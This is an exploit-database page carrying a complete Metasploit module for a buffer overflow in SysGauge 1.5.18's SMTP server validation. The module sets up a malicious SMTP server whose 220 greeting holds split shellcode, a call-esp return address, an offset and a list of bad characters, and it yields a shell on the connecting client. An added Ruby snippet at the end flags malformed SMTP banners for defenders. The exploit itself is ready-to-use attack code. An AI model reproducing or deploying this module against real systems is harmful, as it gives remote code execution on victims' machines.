SysGauge SMTP Validation Buffer Overflow Exploit

22 Mar 2017 00:00:00 | Reported by: metasploit | Type: zdt | Source: 0day.today

SysGauge SMTP Validation Buffer Overflow Exploit. Sets up a malicious SMTP server whose 220 greeting overflows a buffer in SysGauge 1.5.18 during its SMTP server validation, resulting in an unprivileged shell on the client.

Code
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::TcpServer

  Rank = NormalRanking

  def initialize()
    super(
      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
      'Description'    => %q{
        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
        via its SMTP server validation. The module sends a malicious response along in the
        220 service ready response and exploits the client, resulting in an unprivileged shell.
      },
      'Author'         =>
      [
        'Chris Higgins', # msf Module -- @ch1gg1ns
        'Peter Baris'    # Initial discovery and PoC
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
      [
        [ 'EDB', '41479' ],
      ],
      'DefaultOptions' =>
      {
        'EXITFUNC' => 'thread'
      },
      'Payload'        =>
      {
        'Space' => 306,
        'BadChars' => "\x00\x0a\x0d\x20"
      },
      'Platform'  => 'win',
      'Targets'       =>
      [
        [ 'Windows Universal',
          {
            'Offset' => 176,
            'Ret'    => 0x6527635E # call esp # QtGui4.dll
          }
        ]
      ],
      'Privileged'    => false,
      'DisclosureDate' => 'Feb 28 2017',
      'DefaultTarget' => 0
      )
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
      ])
  end

  def on_client_connect(c)
    # Note here that the payload must be split into two parts.
    # The payload gets jumbled in the stack so we need to split
    # and align to get it to execute correctly.
    sploit =  "220 "
    sploit << rand_text(target['Offset'])
    # Can only use the last part starting from 232 bytes in
    sploit << payload.encoded[232..-1]
    sploit << rand_text(2)
    sploit << [target.ret].pack('V')
    sploit << rand_text(12)
    sploit << make_nops(8)
    # And the first part up to 232 bytes
    sploit << payload.encoded[0..231]
    sploit << "ESMTP Sendmail \r\n"

    print_status("Client connected: " + c.peerhost)
    print_status("Sending payload...")

    c.put(sploit)
  end

end

#  0day.today [2018-03-20]  #
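The vulnerable behaviour above is a client that copies an oversized, binary-laden 220 greeting into a fixed buffer. As an added example, not part of the original module or of Metasploit, here is a small Ruby checker a defender can run over captured SMTP reply lines to flag greetings no compliant server would send; the banners and the RFC 5321 line limit are the only inputs, and both sample banners are constructed here.

```ruby
# Added example (not from the original module): flag SMTP reply lines that
# exceed RFC 5321 limits or carry bytes a legitimate banner never contains.

# RFC 5321 section 4.5.3.1.5: a reply line is at most 512 octets, CRLF included.
MAX_REPLY_LINE = 512

# Returns an array of findings for one raw SMTP reply line (empty when clean).
def inspect_smtp_reply(line)
  findings = []
  bytes = line.b # inspect raw octets, independent of the source string encoding
  if bytes.bytesize > MAX_REPLY_LINE
    findings << "reply exceeds #{MAX_REPLY_LINE} octets (#{bytes.bytesize})"
  end
  # A reply must start with a three-digit code followed by a space or hyphen.
  findings << "malformed reply code" unless bytes.match?(/\A\d{3}[ -]/n)
  # Banner text is printable ASCII plus CRLF; anything else is out of place.
  findings << "non-printable bytes in banner" if bytes.match?(/[^\x20-\x7e\r\n]/n)
  findings
end

def suspicious_banner?(line)
  !inspect_smtp_reply(line).empty?
end

# Constructed sample: a normal greeting.
BENIGN_BANNER = "220 mail.example.test ESMTP Sendmail ready\r\n"
# Constructed sample: an oversized greeting padded with filler and a few
# arbitrary non-printable bytes, mimicking the shape (not the content) of
# the malicious 220 response the module above builds.
OVERSIZED_BANNER = ("220 " + ("A" * 600) + "\x90\x90\xcc" + "ESMTP Sendmail \r\n").b

if __FILE__ == $0
  [BENIGN_BANNER, OVERSIZED_BANNER].each do |banner|
    findings = inspect_smtp_reply(banner)
    puts "#{banner[0, 16].inspect}... => #{findings.empty? ? 'ok' : findings.join('; ')}"
  end
end
```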


Vulners AI Score: 6.9 (Medium risk)